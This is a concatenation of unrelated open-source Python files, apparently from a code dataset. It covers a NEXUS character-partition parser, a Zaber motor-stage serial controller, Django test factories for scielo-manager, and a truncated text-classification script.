__init__(self, theNexusSets): self.nexusSets = theNexusSets self.name = None self.lowName = None self.tokens = [] self.subsets = [] def _readCharPartitionDefinition(self, flob): gm = ['CharPartition._readCharPartitionDefinition()'] if hasattr(flob, 'name') and flob.name: gm.append("file name %s" % flob.name) tok = func.nexusUnquoteName(safeNextTok(flob, gm[0])) lowTok = string.lower(tok) while lowTok != '=': if lowTok == '(': tok = func.nexusUnquoteName(safeNextTok(flob, gm[0])) lowTok = string.lower(tok) while lowTok != ')': if lowTok in ['notokens', 'vector']: gm.append("Got charpartition modifier: '%s'" % tok) gm.append("It is not implemented.") gm.append( "Only 'tokens' and 'standard' are implemented.") raise P4Error(gm) elif lowTok in ['tokens', 'standard']: pass else: gm.append("Got charpartition modifier: '%s'" % tok) gm.append("This is not understood.") gm.append( "(Only 'tokens' and 'standard' are implemented.)") raise P4Error(gm) tok = func.nexusUnquoteName(safeNextTok(flob, gm[0])) lowTok = string.lower(tok) else: gm.append("Got unexpected token: '%s'" % tok) gm.append( "I was expecting either an '=' or something in parentheses.") raise P4Error(gm) tok = func.nexusUnquoteName(safeNextTok(flob, gm[0])) lowTok = string.lower(tok) while lowTok not in [None, ';', 'end', 'endblock']: self.tokens.append(tok) tok = func.nexusUnquoteName(safeNextTok(flob, gm[0])) lowTok = string.lower(tok) # print "_readCharPartitionDefinition: tokens %s" % self.tokens # Divide into CharPartitionSubset instances i = 0 while i < len(self.tokens): aSubset = CharPartitionSubset() aSubset.name = self.tokens[i] if not func.nexusCheckName(aSubset.name): gm.append("CharPartition '%s' definition:" % self.name) gm.append("Bad subset name (%s, I think)" % aSubset.name) raise P4Error(gm) aSubset.lowName = string.lower(aSubset.name) i += 1 if i >= len(self.tokens): gm.append("CharPartition '%s' definition:" % self.name) gm.append( "Subset name (%s) should be followed by a colon" % aSubset.name) raise P4Error(gm) if self.tokens[i] != ':': gm.append("CharPartition '%s' definition:" % self.name) gm.append( "Subset name (%s) should be followed by a colon" % aSubset.name) raise P4Error(gm) i += 1 if i >= len(self.tokens): gm.append("CharPartition '%s' definition:" % self.name) gm.append( "Subset name (%s) and colon should be followed" % aSubset.name) gm.append( "by a subset definition (charSet or charSet definition)") raise P4Error(gm) while i < len(self.tokens) and self.tokens[i] != ',': aSubset.tokens.append(self.tokens[i]) i += 1 i += 1 self.subsets.append(aSubset) # do a once-over sanity check, # check for duplicated names # and convert integer strings to ints existingPartNames = [] for aSubset in self.subsets: # print "Checking charPartitionPart '%s'" % aSubset.name # print " existingPartNames '%s'" % existingPartNames if aSubset.lowName in existingPartNames: gm.append("CharPartition '%s' definition:" % self.name) gm.append("Duplicated subset name (%s, I think)" % aSubset.name) raise P4Error(gm) existingPartNames.append(aSubset.lowName) for i in range(len(aSubset.tokens)): tok = aSubset.tokens[i] lowTok = string.lower(tok) # print "considering '%s', ord(lowTok[0])=%i" % (lowTok, # ord(lowTok[0])) # Does not pick up '.'!!!! if lowTok in ['.', 'all', '-', '\\', 'remainder']: pass elif lowTok in self.nexusSets.charSetLowNames: pass elif lowTok in self.nexusSets.predefinedCharSetLowNames: pass else: # print " lowTok=%s, ord(lowTok[0])=%s, ord('.')=%s" % ( # lowTok, ord(lowTok[0]), ord('.')) try: intTok = int(tok) aSubset.tokens[i] = intTok except ValueError: gm.append("CharPartition '%s' definition:" % self.name) gm.append("Can't understand '%s' in subset '%s' definition" % (tok, aSubset.name)) gm.append( "(If you are using read('whatever'), and there are backslashes,") gm.append( "are you using raw strings, ie read(r'whatever')?)") raise P4Error(gm) def setSubsetMasks(self): """Make charParititionSubset.mask's appropriate to the Alignment. This is called by theAlignment.setCharPartition(). """ gm = ['CharPartition.setSubsetMasks()'] assert self.nexusSets.aligNChar # Make a list of triplets representing eg 23-87\3 # first item = 23, second item = 87, third = 3 # Not all will exist for each part of the char definition. for aSubset in self.subsets: i = 0 aSubset.triplets = [] while i < len(aSubset.tokens): tok = aSubset.tokens[i] if type(tok) == type('string'): lowTok = string.lower(tok) else: lowTok = None # print "Doing triplets: looking at tok '%s'" % tok if lowTok and lowTok in self.nexusSets.charSetLowNames or \ lowTok in self.nexusSets.predefinedCharSetLowNames: aTriplet = [lowTok, None, None] aSubset.triplets.append(aTriplet) i += 1 if i < len(aSubset.tokens): if aSubset.tokens[i] == '-': gm.append( "CharPartition '%s' definition" % self.name) gm.append("Subset '%s' definition" % aSubset.name) gm.append( "An existing char set may not be followed by a '-'") raise P4Error(gm) if aSubset.tokens[i] == '\\': gm.append( "CharPartition '%s' definition" % self.name) gm.append("Subset '%s' definition" % aSubset.name) gm.append( "An existing char set may not be followed by a '\\'") raise P4Error(gm) elif lowTok in ['all', 'remainder']: aTriplet = [lowTok, None, None] aSubset.triplets.append(aTriplet) i += 1 if lowTok == 'remainder' and i < len(aSubset.tokens): gm.append("CharPartition '%s' definition" % self.name) gm.append("Subset '%s' definition" % aSubset.name) gm.append( "Char set 'remainder' must be the last one in the charPartition definition") raise P4Error(gm) if i < len(aSubset.tokens): if aSubset.tokens[i] == '-': gm.append( "CharPartition '%s' definition" % self.name) gm.append("Subset '%s' definition" % aSubset.name) gm.append( "Char set '%s' may not be followed by a '-'" % lowTok) raise P4Error(gm) if aSubset.tokens[i] == '\\': gm.append( "CharPartition '%s' definition" % self.name) gm.append("Subset '%s' definition" % aSubset.name) gm.append( "Char set '%s' may not be followed by a '\\'" % lowTok) raise P4Error(gm) elif tok == '-': gm.append("CharPartition '%s' definition" % self.name) gm.append("Subset '%s' definition" % aSubset.name) gm.append("Out of place '-'") raise P4Error(gm) elif tok == '\\': gm.append("CharPartition '%s' definition" % self.name) gm.append("Subset '%s' definition" % aSubset.name) gm.append("Out of place '\\'") raise P4Error(gm) elif tok == '.': aTriplet = [tok, None, None] aSubset.triplets.append(aTriplet) i += 1 if i < len(aSubset.tokens): if aSubset.tokens[i] == '-': gm.append( "CharPartition '%s' definition" % self.name) gm.append("Subset '%s' definition" % aSubset.name) gm.append( "Char set '.' may not be followed by a '-'") raise P4Error(gm) if aSubset.tokens[i] == '\\': gm.append( "CharPartition '%s' definition" % self.name) gm.append("Subset '%s' definition" % aSubset.name) gm.append( "Char set '.' may not be followed by a '\\'") raise P4Error(gm) elif type(tok) == type(1): aTriplet = [tok, None, None] i = i + 1 if i < len(aSubset.tokens): if aSubset.tokens[i] == '-': i = i + 1 if i < len(aSubset.tokens): if aSubset.tokens[i] == '.': aTriplet[1] = aSubset.tokens[i] elif type(aSubset.tokens[i]) == type(1): if aSubset.tokens[i] > aTriplet[0]: aTriplet[1] = aSubset.tokens[i] else: gm.append( "CharPartition '%s' definition" % self.name) gm.append( "Subset '%s' definition" % aSubset.name) gm.append( "Second number of a character range must be bigger than") gm.append("the first.") raise P4Error(gm) else: gm.append( "CharPartition '%s' definition" % self.name) gm.append( "Subset '%s' definition" % aSubset.name) gm.append( "Second item of a character range must be either a") gm.append( "number or a '.'. I got '%s'" % aSubset.tokens[i]) raise P4Error(gm) i = i + 1 if i < len(aSubset.tokens): if aSubset.tokens[i] == '\\': i = i + 1 if i < len(aSubset.tokens): if type(aSubset.tokens[i]) == type(1): aTriplet[2] = aSubset.tokens[i] else: gm.append( "CharPartition '%s' definition" % self.name) gm.append( "Subset '%s' definition" % aSubset.name) gm.append( "Step value of a range must be a number") gm.append( "(Got '%s')" % aSubset.tokens[i]) raise P4Error(gm) i = i + 1 aSubset.triplets.append(aTriplet) else: gm.append("CharPartition '%s' definition" % self.name) gm.append("Subset '%s' definition" % aSubset.name) gm.append("token '%s' is not understood." % tok) raise P4Error(gm) if 0: print gm[0] print "Got aSubset (%s) triplets %s" % (aSubset.name, aSubset.triplets) # sys.exit() aSubset.mask = array.array('c', self.nexusSets.aligNChar * '0') for aTriplet in aSubset.triplets: # print "setSubsetMasks() Looking at triplet '%s'" % aTriplet first = aTriplet[0] second = aTriplet[1] third = aTriplet[2] lowFirst = None lowSecond = None if type(first) == type('str'): lowFirst = string.lower(first) if type(second) == type('str'): lowSecond = string.lower(second) if first and not second: # its a single # print "Got single: %s" % first if lowFirst == 'all': for i in range(self.nexusSets.aligNChar): aSubset.mask[i] = '1' elif lowFirst in self.nexusSets.predefinedCharSetLowNames: theCS = None if lowFirst == 'constant': theCS = self.nexusSets.constant elif lowFirst == 'gapped': theCS = self.nexusSets.gapped assert theCS assert theCS.mask for j in range(self.nexusSets.aligNChar): if theCS.mask[j] == '1': aSubset.mask[j] = '1' elif lowFirst in self.nexusSets.charSetLowNames: theCS = None for cs in self.nexusSets.charSets: if lowFirst == cs.lowName: theCS = cs break assert theCS assert theCS.mask for j in range(self.nexusSets.aligNChar): if theCS.mask[j] == '1': aSubset.mask[j] = '1' # Its legit to use this as a single char. elif first == '.': aSubset.mask[-1] = '1' elif type(first) == type(1): if first > 0 and first <= self.nexusSets.aligNChar: aSubset.mask[first - 1] = '1' else: gm.append( "CharPartition '%s' definition" % self.name) gm.append("Subset '%s' definition" % aSubset.name) gm.append( "Charset definition element '%s' is out of range" % first) gm.append("(aligNChar = %i)" % self.nexusSets.aligNChar) raise P4Error(gm) elif lowFirst == 'remainder': # print "Got first == remainder" for i in range(self.nexusSets.aligNChar): aSubset.mask[i] = '1' # print "Got new aSubset.mask = %s" % aSubset.mask for ss in self.subsets[:-1]: if ss.mask: # print "Previous mask: %s" % ss.mask for j in range(self.nexusSets.aligNChar): if ss.mask[j] == '1': aSubset.mask[j] = '0' else: gm.append( "CharPartition '%s' definition" % self.name) gm.append("Subset '%s' definition" % aSubset.name) gm.append( "When implementing 'remainder' charset") gm.append( "Found that subset '%s' had no mask" % ss) raise P4Error(gm) else: gm.append("CharPartition '%s' definition" % self.name) gm.append("Subset '%s' definition" % aSubset.name) gm.append( "Charset definition element '%s' is not understood" % first) raise P4Error(gm) elif first and second: # its a range try: start = int(first) except ValueError: gm.append("CharPartition '%s' definition" % self.name) gm.append("Subset '%s' definition" % aSubset.name) gm.append( "Can't parse definition element '%s'" % first) raise P4Error(gm) if second == '.': fin = len(aSubset.mask) else: try: fin = int(second) except ValueError: gm.append( "CharPartition '%s' definition" % self.name) gm.append("Subset '%s' definition" % aSubset.name) gm.append( "Can't parse definition element '%s'" % second) raise P4Error(gm) if third: try: bystep = int(third) except ValueError: gm.append( "CharPartition '%s' definition" % self.name) gm.append("Subset '%s' definition" % aSubset.name) gm.append( "Can't parse definition element '%s'" % third) for spot in range(start - 1, fin, bystep): aSubset.mask[spot] = '1' else: for spot in range(start - 1, fin): aSubset.mask[spot] = '1' aSubset.mask = aSubset.mask.tostring() # print "Got char subset '%s' mask '%s'" % (aSubset.name, # aSubset.mask) if aSubset.mask.count('1') == 0: gm.append( "The mask for charPartitionSubset '%s' is empty." % aSubset.name) raise P4Error(gm) def checkForOverlaps(self): gm = ['CharParitition.checkForOverlaps()'] unspanned = 0 for i in range(self.nexusSets.aligNChar): sum = 0 for aSubset in self.subsets: if aSubset.mask[i] == '1': sum += 1 if sum > 1: gm.append("Char partition '%s'" % self.name) gm.append( "The problem is that there are overlapping subsets in this") gm.append( "charpartition. The same position is in more than one subset.") gm.append( "Zero-based position %i, one-based position %i." % (i, i + 1)) raise P4Error(gm) if sum < 1: unspanned = 1 if unspanned: gm.append("Char partition '%s'" % self.name) gm.append("You should be aware that this partition does not span") gm.append("the entire sequence. Hopefully that is intentional.") def dump(self): print " CharPartition: name: %s" % func.nexusFixNameIfQuotesAreNeeded(self.name) # string.join(self.tokens) print " tokens: %s" % self.tokens # for t in self.tokens: # print " %s" % t print " number of subsets: %s" % len(self.subsets) for aSubset in self.subsets: aSubset.dump() def writeNexusToOpenFile(self, flob): flob.write(' charPartition %s = ' % self.name) # print " [ %s subsets ] " % len(self.subsets) for aSubset in self.subsets[:-1]: aSubset.writeNexusToOpenFile(flob) flob.write(', ') self.subsets[-1].writeNexusToOpenFile(flob) flob.write(';\n') def mask(self): if not self.nexusSets.aligNChar: self.nexusSets.aligNChar = self.theNexusSets.aligNChar self.setSubsetMasks() import array m = array.array('c', self.nexusSets.aligNChar * '0') for i in range(self.nexusSets.aligNChar): for aSubset in self.subsets: if aSubset.mask[i] == '1': m[i] = '1' return m.tostring()
gpl-2.0
7,514,382,857,311,807,000
41.579559
123
0.453856
false
AndrewGYork/tools
zaber.py
1
8750
import time import serial class Stage: """Zaber stage(s), attached through the (USB?) serial port.""" def __init__( self, port_name, # For example, 'COM3' on Windows timeout=1, verbose=True, very_verbose=False): """port_name: which serial port the stage is connected to, e.g. 'COM3' """ self.verbose = verbose self.very_verbose = very_verbose try: self.serial = serial.Serial( port=port_name, baudrate=9600, bytesize=8, parity='N', stopbits=1, timeout=timeout) except serial.serialutil.SerialException: print('Failed to open serial port for Zaber stage(s).') print('Sometimes Windows is weird about this!') print('Consider trying again.') raise if self.verbose: print("Renumbering stages:") self.devices = self.renumber_all_devices() self.pending_moves = [False for d in self.devices] if self.verbose: for d in self.devices: print(' Axis:', d) print(' Done renumbering.') self.restore_settings() self.default_speed = min([r['speed'] for r in self.get_target_speed()]) if verbose: print(" Default stage speed:", self.default_speed) self.move_home() def send(self, instruction): """Send an instruction to the Zaber stage. 'instruction' must be a list of 6 integers, 0-255 (no error checking). See: http://www.zaber.com/wiki/Manuals/Binary_Protocol_Manual for a list of instructions. """ assert len(instruction) == 6 if self.very_verbose: print("Sending to stage:", instruction) serial_cmd = bytes(instruction) # 0 <= int(i) < 256 for i in instruction self.serial.write(serial_cmd) return None def receive(self, expected_command_ID=None): """Return 6 bytes from the serial port There must be 6 bytes to receive (no error checking). """ response = self.serial.read(6) if len(response) != 6: raise UserWarning( "Zaber stage failed to respond. Is the timeout too short?\n" + "Is the stage plugged in?") response = {'device_number': response[0], 'command_ID': response[1], 'data': four_bytes_to_uint(response[2:6])} if expected_command_ID is not None: assert response['command_ID'] == expected_command_ID if self.very_verbose: print("Response from stage:\n", response) return response def get_position(self, axis='all'): if axis == 'all': axis = 0 num_responses = len(self.devices) else: num_responses = 1 assert axis in range(len(self.devices) + 1) self.send([axis, 60, 0, 0, 0, 0]) responses = [] for i in range(num_responses): responses.append(self.receive(expected_command_ID=60)) axis_positions = {} for r in responses: axis_positions[r['device_number']] = r['data'] return axis_positions def move(self, distance, movetype='absolute', response=True, axis='all'): distance = int(distance) if self.verbose: print("Moving axis: ", repr(axis), " distance ", distance, " (", movetype, ")", sep='') if axis == 'all': axis = 0 assert self.pending_moves == [False for d in self.devices] else: assert axis in [d['device_number'] for d in self.devices] assert self.pending_moves[(axis - 1)] == False if movetype == 'absolute': instruction = [axis, 20] elif movetype == 'relative': instruction = [axis, 21] else: raise UserWarning("Move type must be 'relative' or 'absolute'") # Data conversion and transfer: instruction.extend(uint_to_four_bytes(distance)) self.send(instruction) if axis == 0: self.pending_moves = [True for d in self.devices] else: self.pending_moves[axis - 1] = True if response: return self.finish_moving() return None def finish_moving(self): response = [] for i in range(len(self.devices)): if self.pending_moves[i]: response.append(self.receive()) assert response[-1]['command_ID'] in (1, 20, 21) self.pending_moves = [False for d in self.devices] assert self.serial.inWaiting() == 0 return response def move_home(self, response=True): if self.verbose: print("Moving stage(s) near home...") self.move(100) if self.verbose: print("Moving stage(s) home.") assert self.pending_moves == [False for d in self.devices] self.send([0, 1, 0, 0, 0, 0]) self.pending_moves = [True for d in self.devices] if response: return self.finish_moving() return None def restore_settings(self): if self.verbose: print("Restoring stage(s) to default settings.") assert self.pending_moves == [False for d in self.devices] assert self.serial.inWaiting() == 0 self.send([0, 36, 0, 0, 0, 0]) # Restore to default settings for d in self.devices: self.receive(expected_command_ID=36) self.send([0, 116, 1, 0, 0, 0]) # Disable manual move tracking for d in self.devices: self.receive(expected_command_ID=116) assert self.serial.inWaiting() == 0 return None def renumber_all_devices(self): self.serial.flushInput() self.serial.flushOutput() self.send([0, 2, 0, 0, 0, 0]) # We can't predict the length of the response, since we don't # yet know how many stages there are. Just wait a healthy amount # of time for the answer: time.sleep(.8) # Seems to take a little over 0.5 seconds. bytes_waiting = self.serial.inWaiting() assert bytes_waiting % 6 == 0 # Each stage responds with 6 bytes. num_stages = int(bytes_waiting / 6) stages = [] for n in range(num_stages): r = self.receive() assert (r['device_number'] - 1) in range(num_stages) assert r.pop('command_ID') == 2 r['device_ID'] = r.pop('data') assert r['device_ID'] in (# List of devices we've tested; add liberally. 20053, ) stages.append(r) assert self.serial.inWaiting() == 0 return stages def set_target_speed(self, speed, response=True): min_speed = int(self.default_speed * 0.01) max_speed = int(2*self.default_speed) speed = int(speed) assert min_speed <= speed < max_speed if self.verbose: print("Setting stage speed to", speed) inst = [0, 42] inst.extend(uint_to_four_bytes(speed)) self.send(inst) if response: reply = [self.receive(expected_command_ID=42) for d in self.devices] return reply def get_target_speed(self): inst = [0, 53, 42, 0, 0, 0] self.send(inst) reply = [] for d in self.devices: reply.append(self.receive()) assert reply[-1].pop('command_ID') == 42 reply[-1]['speed'] = reply[-1].pop('data') return reply def close(self): self.move_home() self.serial.close() def four_bytes_to_uint(x): assert len(x) == 4 return int.from_bytes(x, byteorder='little') def uint_to_four_bytes(x): assert 0 <= x < 4294967296 return [x >> i & 0xff for i in (0, 8, 16, 24)] if __name__ == '__main__': my_stage = Stage(port_name='COM3', verbose=True, very_verbose=False) try: my_stage.move(0, movetype='absolute', axis='all') for i in range(len(my_stage.devices)): my_stage.move(70000, movetype='absolute', axis=i+1) print("Stage postion:", my_stage.get_position()) my_stage.move(0, movetype='absolute', axis=i+1) print("Stage postion:", my_stage.get_position()) my_stage.set_target_speed(my_stage.default_speed * 1.3) my_stage.move(70000, movetype='absolute', axis='all') print("Stage postion:", my_stage.get_position()) my_stage.move(0, movetype='absolute', axis='all') print("Stage postion:", my_stage.get_position()) my_stage.set_target_speed(my_stage.default_speed) finally: my_stage.close()
gpl-2.0
8,001,192,624,062,251,000
37.377193
84
0.56
false
jfunez/scielo-manager
scielomanager/journalmanager/tests/modelfactories.py
1
7014
# coding: utf-8 import factory import datetime from journalmanager import models class ArticleFactory(factory.Factory): FACTORY_FOR = models.Article front = { 'default-language': 'en', 'title-group': { 'en': u'Article Title', 'pt': u'Título do Artigo', } } xml_url = 'http://xml.url/' pdf_url = 'http://pdf.url/' images_url = 'http://img.url/' class UserFactory(factory.Factory): FACTORY_FOR = models.User @classmethod def _setup_next_sequence(cls): try: return cls._associated_class.objects.values_list( 'id', flat=True).order_by('-id')[0] + 1 except IndexError: return 0 username = factory.Sequence(lambda n: "username%s" % n) first_name = factory.Sequence(lambda n: "first_name%s" % n) last_name = factory.Sequence(lambda n: "last_name%s" % n) email = factory.Sequence(lambda n: "email%s@example.com" % n) password = 'sha1$caffc$30d78063d8f2a5725f60bae2aca64e48804272c3' is_staff = False is_active = True is_superuser = False last_login = datetime.datetime(2000, 1, 1) date_joined = datetime.datetime(1999, 1, 1) class SubjectCategoryFactory(factory.Factory): FACTORY_FOR = models.SubjectCategory term = 'Acoustics' class StudyAreaFactory(factory.Factory): FACTORY_FOR = models.StudyArea study_area = 'Health Sciences' class SponsorFactory(factory.Factory): FACTORY_FOR = models.Sponsor name = u'Fundação de Amparo a Pesquisa do Estado de São Paulo' address = u'Av. Professor Lineu Prestes, 338 Cidade Universitária \ Caixa Postal 8105 05508-900 São Paulo SP Brazil Tel. / Fax: +55 11 3091-3047' email = 'fapesp@scielo.org' complement = '' class UseLicenseFactory(factory.Factory): FACTORY_FOR = models.UseLicense license_code = factory.Sequence(lambda n: 'CC BY-NC-SA%s' % n) reference_url = u'http://creativecommons.org/licenses/by-nc-sa/3.0/deed.pt' disclaimer = u'<a rel="license" href="http://creativecommons.org/licenses/by-nc-sa/3.0/"><img alt="Licença Creative Commons" style="border-width:0" src="http://i.creativecommons.org/l/by-nc-sa/3.0/88x31.png" /></a><br />Este trabalho foi licenciado com uma Licença <a rel="license" href="http://creativecommons.org/licenses/by-nc-sa/3.0/">Creative Commons - Atribuição - NãoComercial - CompartilhaIgual 3.0 Não Adaptada</a>.' class CollectionFactory(factory.Factory): FACTORY_FOR = models.Collection url = u'http://www.scielo.br/' name = factory.Sequence(lambda n: 'scielo%s' % n) address_number = u'430' country = u'Brasil' address = u'Rua Machado Bittencourt' email = u'fapesp@scielo.org' name_slug = factory.Sequence(lambda n: 'scl%s' % n) class JournalFactory(factory.Factory): FACTORY_FOR = models.Journal ctrl_vocabulary = u'decs' frequency = u'Q' scielo_issn = u'print' print_issn = factory.Sequence(lambda n: '1234-%04d' % int(n)) init_vol = u'1' title = u'ABCD. Arquivos Brasileiros de Cirurgia Digestiva (São Paulo)' title_iso = u'ABCD. Arquivos B. de C. D. (São Paulo)' short_title = u'ABCD.(São Paulo)' editorial_standard = u'vancouv' secs_code = u'6633' init_year = u'1986' acronym = factory.Sequence(lambda n: 'ABCD%s' % int(n)) pub_level = u'CT' init_num = u'1', subject_descriptors = u""" MEDICINA CIRURGIA GASTROENTEROLOGIA GASTROENTEROLOGIA""".strip() pub_status = u'current' pub_status_reason = u'Motivo da mudança é...' publisher_name = u'Colégio Brasileiro de Cirurgia Digestiva' publisher_country = u'BR' publisher_state = u'SP' publication_city = u'São Paulo' editor_address = u'Av. Brigadeiro Luiz Antonio, 278 - 6° - Salas 10 e 11, 01318-901 São Paulo/SP Brasil, Tel. = (11) 3288-8174/3289-0741' editor_email = u'cbcd@cbcd.org.br' creator = factory.SubFactory(UserFactory) pub_status_changed_by = factory.SubFactory(UserFactory) use_license = factory.SubFactory(UseLicenseFactory) collection = factory.SubFactory(CollectionFactory) class SectionFactory(factory.Factory): FACTORY_FOR = models.Section code = factory.Sequence(lambda n: 'BJCE%s' % n) journal = factory.SubFactory(JournalFactory) class LanguageFactory(factory.Factory): FACTORY_FOR = models.Language iso_code = 'pt' name = 'portuguese' class IssueTitleFactory(factory.Factory): """ ``issue`` must be provided """ FACTORY_FOR = models.IssueTitle language = factory.SubFactory(LanguageFactory) title = u'Bla' class IssueFactory(factory.Factory): FACTORY_FOR = models.Issue total_documents = 16 number = factory.Sequence(lambda n: '%s' % n) volume = factory.Sequence(lambda n: '%s' % n) is_trashed = False publication_start_month = 9 publication_end_month = 11 publication_year = 2012 is_marked_up = False suppl_text = '1' journal = factory.SubFactory(JournalFactory) @classmethod def _prepare(cls, create, **kwargs): section = SectionFactory() issue = super(IssueFactory, cls)._prepare(create, **kwargs) issue.section.add(section) return issue class UserProfileFactory(factory.Factory): FACTORY_FOR = models.UserProfile user = factory.SubFactory(UserFactory) email = factory.Sequence(lambda n: 'email%s@example.com' % n) class SectionTitleFactory(factory.Factory): FACTORY_FOR = models.SectionTitle title = u'Artigos Originais' language = factory.SubFactory(LanguageFactory) section = factory.SubFactory(SectionFactory) class DataChangeEventFactory(factory.Factory): FACTORY_FOR = models.DataChangeEvent user = factory.SubFactory(UserFactory) content_object = factory.SubFactory(JournalFactory) collection = factory.SubFactory(CollectionFactory) event_type = 'added' class RegularPressReleaseFactory(factory.Factory): FACTORY_FOR = models.RegularPressRelease issue = factory.SubFactory(IssueFactory) doi = factory.Sequence(lambda n: 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n) class AheadPressReleaseFactory(factory.Factory): FACTORY_FOR = models.AheadPressRelease journal = factory.SubFactory(JournalFactory) doi = factory.Sequence(lambda n: 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n) class PressReleaseTranslationFactory(factory.Factory): FACTORY_FOR = models.PressReleaseTranslation language = factory.SubFactory(LanguageFactory) press_release = factory.SubFactory(RegularPressReleaseFactory) title = u'Yeah, this issue is amazing!' content = u'Want to read more about...' class PressReleaseArticleFactory(factory.Factory): FACTORY_FOR = models.PressReleaseArticle press_release = factory.SubFactory(RegularPressReleaseFactory) article_pid = factory.Sequence(lambda n: 'S0102-311X201300030000%s' % n)
bsd-2-clause
7,171,025,614,157,088,000
29.806167
429
0.680967
false
rbharvs/mnd-learning
supervised.py
1
8636
import sys import parsetags import numpy as np from sklearn.feature_extraction.text import CountVectorizer from sklearn.feature_extraction.text import TfidfTransformer from sklearn.naive_bayes import MultinomialNB from sklearn import svm from sklearn.decomposition import PCA as PCA from mpl_toolkits.mplot3d import Axes3D import matplotlib.pyplot as plt import nltk from nltk.stem import LancasterStemmer import re def get_top_tags(segment_tags, n): tag_freqs = {} for tag_list in segment_tags.values(): for tag in tag_list: if tag not in tag_freqs: tag_freqs[tag] = 0 tag_freqs[tag] += 1 return ['NULL'] + sorted(tag_freqs.keys(), key=lambda x: tag_freqs[x])[-n:] def get_common_words(n=100): try: file_content = open(sys.argv[3]).read() common_words = nltk.word_tokenize(file_content) except IndexError: return None return set(common_words[:n]) def get_named_entities(): try: file_content = open(sys.argv[2]).read() named_entities = nltk.word_tokenize(file_content) except IndexError: return None return set(named_entities) def filter_segments(segment_tags, ntags): filtered_segtags = {} for segment in segment_tags: # np.random.shuffle(segment_tags[segment]) for tag in segment_tags[segment]: if tag not in ntags: continue filtered_segtags[segment] = ntags.index(tag) if segment not in filtered_segtags: filtered_segtags[segment] = 0 return filtered_segtags def increase_num_segments(segment_tags, n, length=1000): new_segment_tags = {} segments = sorted(segment_tags.keys(), key=len) lengths = np.array([len(seg) for seg in segments]) dist = lengths/np.sum(lengths) random_segments = np.random.choice(segments, size=n, p=dist) for segment in random_segments: new_segment = segment if len(new_segment) > length: index = np.random.randint(0, len(new_segment)-length) new_segment = new_segment[index:index+length] new_segment_tags[new_segment] = segment_tags[segment] return new_segment_tags def named_entity_reduction(segment_tags, named_entities, common_words): punctuation = [',', '.', "'", '?', ';', ':', '!', '(', ')', '`', '--' '\xe2', '\x80', '\x94', '\x99'] new_segments = [] segments = list(segment_tags.keys()) for segment in segments: new_segment = '' tokens = nltk.word_tokenize(segment) for token in tokens: if token in punctuation: continue if token.lower() in common_words: continue if token not in named_entities: continue new_segment += token + ' ' new_segments.append(new_segment) new_segment_tags = {} for i in range(len(segments)): new_segment_tags[new_segments[i]] = segment_tags[segments[i]] return new_segment_tags def stemming_reduction(segment_tags): punctuation = [',', '.', "'", '?', ';', ':', '!', '(', ')', '`', '--' '\xe2', '\x80', '\x94', '\x99'] new_segments = [] stemmer = LancasterStemmer() segments = list(segment_tags.keys()) for segment in segments: new_segment = '' segment = re.sub(r'[^\x00-\x7f]',r'', segment) tokens = nltk.word_tokenize(segment) for token in tokens: if token in punctuation: continue try: new_segment += stemmer.stem(token)+' ' except UnicodeDecodeError: new_segment += '' new_segments.append(new_segment) stemmed_segment_tags = {} for i in range(len(segments)): stemmed_segment_tags[new_segments[i]] = segment_tags[segments[i]] return stemmed_segment_tags def separate_segments(segment_tags, k): train = {} for segment in segment_tags.keys(): if np.random.random() < k: train[segment] = segment_tags.pop(segment) return train, segment_tags def bag_of_words(segment_tags, tfidf=False): #create matrix of word frequencies segments = list(segment_tags.keys()) vec = CountVectorizer() word_freqs = vec.fit_transform(segments).toarray() if tfidf: tfidf_transformer = TfidfTransformer() word_freqs = tfidf_transformer.fit_transform(word_freqs) labels = np.empty(shape=len(segments)) for i in range(len(segments)): labels[i] = segment_tags[segments[i]] return word_freqs, labels, segments def entity_bow(segment_tags, named_entities, common_words): punctuation = [',', '.', "'", '?', ';', ':', '!', '(', ')', '`', '--' '\xe2', '\x80', '\x94', '\x99'] new_segments = [] segments = list(segment_tags.keys()) for segment in segments: new_segment = '' tokens = nltk.word_tokenize(segment) for token in tokens: if token in punctuation: continue if token.lower() in common_words: continue if token not in named_entities: continue new_segment += token + ' ' new_segments.append(new_segment) vec = CountVectorizer() word_freqs = vec.fit_transform(new_segments).toarray() tfidf_transformer = TfidfTransformer() X_train_tfidf = tfidf_transformer.fit_transform(word_freqs) print(word_freqs.shape, X_train_tfidf.shape) labels = np.empty(shape=len(segments)) for i in range(len(segments)): labels[i] = segment_tags[segments[i]] return X_train_tfidf, labels, segments def pca_plot(Xtrain, ytrain): #binary classification case X_reduced = Xtrain pca = PCA(3) X_pca = pca.fit_transform(X_reduced) ax = plt.axes(projection='3d') for i in range(X_pca.shape[0]): if ytrain[i] == 1: ax.scatter(X_pca[i, 0], X_pca[i, 2], X_pca[i, 1], 'o', color='blue') else: ax.scatter(X_pca[i, 0], X_pca[i, 2], X_pca[i,1], 'x', color='red') plt.show() def randomize_order(X, y, segments): shuffled_segments = [] indices = np.arange(len(segments)) np.random.shuffle(indices) X, y = X[indices], y[indices] for i in indices: shuffled_segments.append(segments[i]) return X, y, segments def naive_bayes(segment_tags, k=0.5, normalize=False): X, y, segments = randomize_order(*bag_of_words(segment_tags, tfidf=normalize)) num_examples = len(segments) Xtest, ytest = X[int(k*num_examples):, :], y[int(k*num_examples):] Xtrain, ytrain = X[:int(k*num_examples), :], y[:int(k*num_examples)] nb_classifier = MultinomialNB().fit(Xtrain, ytrain) nb_predicted_tags = nb_classifier.predict(Xtest) nb_success_rate = np.mean(nb_predicted_tags == ytest) return 1-nb_success_rate def support_vector(segment_tags, k=0.5, normalize=False): X, y, segments = randomize_order(*bag_of_words(segment_tags, tfidf=normalize)) num_examples = len(segments) Xtest, ytest = X[int(k*num_examples):, :], y[int(k*num_examples):] Xtrain, ytrain = X[:int(k*num_examples), :], y[:int(k*num_examples)] svm_classifier = svm.SVC() svm_classifier.fit(Xtrain, ytrain) svm_predicted_tags = svm_classifier.predict(Xtest) svm_success_rate = np.mean(svm_predicted_tags == ytest) return 1-svm_success_rate if __name__ == "__main__": orig_segment_tags = parsetags.parse_tags(sys.argv[1]) common_words = get_common_words() named_entities = get_named_entities() for sample_size in ['BIG']: if sample_size == 'BIG': segment_tags = increase_num_segments(orig_segment_tags, 3000, length=1000) orig_segment_tags = segment_tags for text_features in ['REGULAR', 'STEMMED', 'NAMED']: if text_features == 'STEMMED': segment_tags = stemming_reduction(orig_segment_tags) if text_features == 'NAMED': segment_tags = named_entity_reduction(orig_segment_tags, named_entities, common_words) for 